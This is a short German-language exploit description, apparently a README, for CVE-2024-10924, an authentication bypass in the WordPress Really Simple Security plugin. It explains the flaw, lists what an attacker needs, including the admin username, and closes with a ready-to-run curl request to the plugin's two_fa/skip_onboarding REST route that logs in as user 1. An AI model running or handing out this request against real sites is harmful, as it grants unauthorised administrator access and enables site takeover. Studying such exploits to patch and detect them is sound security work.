
Exploit für CVE-2024-10924, eine kritische Authentifizierungsumgehung im WordPress Really Simple Security Plugin (Versionen 9.0.0-9.1.1.1). Ermöglicht nicht authentifizierten Angreifern, sich als beliebiger Benutzer anzumelden, aufgrund eines Fehlers in der Two-Factor Authentication API.
CVE-2024-10924 ist eine kritische Authentifizierungsumgehungsschwachstelle im Really Simple Security Plugin für WordPress (Versionen 9.0.0 bis 9.1.1.1). Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, sich als beliebiger Benutzer (einschließlich Administrator) anzumelden, indem sie einen Fehler in der Zwei-Faktor-Authentifizierungs-API (2FA) ausnutzen.
Eine WordPress-Seite, die eine anfällige Version des Really Simple Security Plugins ausführt. Python 3.x oder cURL installiert zum Testen. Der Ziel-WordPress-Administrator-Benutzername (Benutzerenumeration kann erforderlich sein).
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v